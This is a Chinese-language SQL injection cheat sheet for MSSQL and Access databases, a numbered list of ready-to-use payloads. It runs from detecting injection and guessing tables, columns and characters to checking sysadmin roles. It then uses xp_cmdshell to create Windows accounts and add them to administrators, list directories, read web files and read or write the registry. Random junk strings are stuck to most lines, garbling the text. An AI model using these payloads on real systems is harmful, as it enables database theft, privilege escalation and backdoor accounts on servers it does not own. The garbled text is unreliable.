1.判断是否有注入;and 1=1 ;and 1=2 5'} V`?S
2.初步判断是否是mssql ;and user>0 UT<e/
.{V"Gn9!
3.注入参数是字符'and [查询条件] and ''=' k;l3^kTy
\vA*dQ-
4.搜索时没过滤参数的'and [查询条件] and '%25'=' "n%s>@$
X94a
5.判断数据库系统 N''QQBUD
ax&?Z5%a
;and (select count(*) from sysobjects)>0 mssql o`bc/3!
%O"8|ZG9{
;and (select count(*) from msysobjects)>0 access bKQho31a'
jxog8E
-> cL)
--5F*a{R|
6.猜数据库 ;and (select Count(*) from [数据库名])>0 -YA,Stc-
r_T)|||v
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 NAR6q{c
t3;Zx+Br
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 7UfNz60+~
s4|\cY`b-
9.(1)猜字段的ascii值(access) *1)>He$qL
![_x/F9
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 KgL!~J
/DQYlNa
(2)猜字段的ascii值(mssql) H"A%mrb
}3(!kW
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
w~66G
um2a#6uo
10.测试权限结构(mssql) s0SzO,Vi
P?0X az
}9fa]D-a?
9zp!lw~;+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ^6s im 2
1dH|/9
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Ca2r<|uA
fLDrit4_Q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- +,Eam6g{
DH(<{ #u
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- yJA~4
yaUtDC.|
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- `[/#,*\
IskL$Y ^
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ? x)^f+:9|
6h:QSVfx
;and 1=(select IS_MEMBER('db_owner'));-- T ,lM(2S[
oRV}Nz7hr
UK =ELvt]
LmrdVSs_
11.添加mssql和系统的帐户 h@,ja
A
6(`
;exec master.dbo.sp_addlogin username;-- _4S^'FDo
;exec master.dbo.sp_password null,username,password;-- YI0
wr1N
Oa[
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *$Q>Om]
I Xc `Ec
;exec master.dbo.xp_cmdshell 'net user username password 3smkY
"{0G,tdA
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- u6|C3,!z"
V DFgu
;exec master.dbo.xp_cmdshell 'net user username password /add';-- O
NabL.CV
QoD_`d
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- sI>w#1.m/&
OSu&vFKz
V?mP7
=EJ&=t
12.(1)遍历目录 8}QM~&&.
UHl3/m7g
;create table dirs(paths varchar(100), id int) oW^b,{~V
AL]gK)R
;insert dirs exec master.dbo.xp_dirtree 'c:\' )nm+_U
>y%H2][
;and (select top 1 paths from dirs)>0 \u[x<-\/6
k+QGvgP[4@
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ff--y8h
&L6Ivpj-
*>m[ZJd %=
%ZVYgtk;*
(2)遍历目录 d4y#n=HnnV
(5T>`7g8
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- j >k
;Zj
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 /~LE1^1&U
i"Jy>'
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |rx5O5p
a%#UF@I
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 O8;/oL4 U
6h9(u7(-N
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 E ,i^rA m
^t0!Dbx3SE
-}7$;QK&a
8h]
TI_
13.mssql中的存储过程 C4m+Ta%
Zkp~qx
xp_regenumvalues 注册表根键, 子键 pGie!2T E
KhjC'CU,
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 hFV,FBsAO
:WB uU
xp_regread 根键,子键,键值名 4Kj.o
-2hirA<^
;exec xp_regread ,_V V;P
rWht},-|1
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Y3 $jNuV
UyGo0POW
xp_regwrite 根键,子键, 值名, 值类型, 值 ')xOL=w
J|WE&5'
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 4\z@Evm
KjGu !B
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 :9&